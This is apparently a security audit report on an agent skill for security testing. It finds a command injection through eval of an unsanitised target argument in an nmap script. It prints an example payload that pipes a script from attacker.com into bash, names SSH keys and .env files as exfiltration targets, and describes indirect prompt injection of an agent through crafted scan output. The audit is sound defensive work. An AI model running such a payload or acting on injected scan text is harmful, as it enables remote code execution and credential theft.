The Agent Skills Directory

[COMMAND_EXECUTION]: The shell script assets/nmap_scan_template.sh contains a severe command injection vulnerability. On line 132, it uses the eval command to execute the NMAP_COMMAND string. This string is constructed using the $TARGET variable (line 126), which is assigned directly from the first command-line argument (TARGET="$1" on line 124) without any sanitization, escaping, or validation. An attacker could exploit this by providing a target string containing shell metacharacters, such as 127.0.0.1; curl http://attacker.com/shell.sh | bash, leading to arbitrary code execution.
[DATA_EXFILTRATION]: While no explicit exfiltration logic was found, the command injection vulnerability in assets/nmap_scan_template.sh can be used to harvest environment variables, local files (like ~/.ssh/id_rsa or .env files), or cloud metadata, and transmit them to an external server.
[PROMPT_INJECTION]: The skill is designed to automate the parsing of security scan reports from tools like Nmap and Nessus. This represents an indirect prompt injection surface where a malicious target could return specially crafted service headers or version strings that, when parsed by the agent, influence its behavior or report generation. * Ingestion points: scripts/report_parser.py (referenced in scripts/README.md). * Boundary markers: Absent in the provided templates. * Capability inventory: File read/write, Bash execution (specified in SKILL.md). * Sanitization: No evidence of input sanitization or output encoding was found in the provided files.

performing-security-testing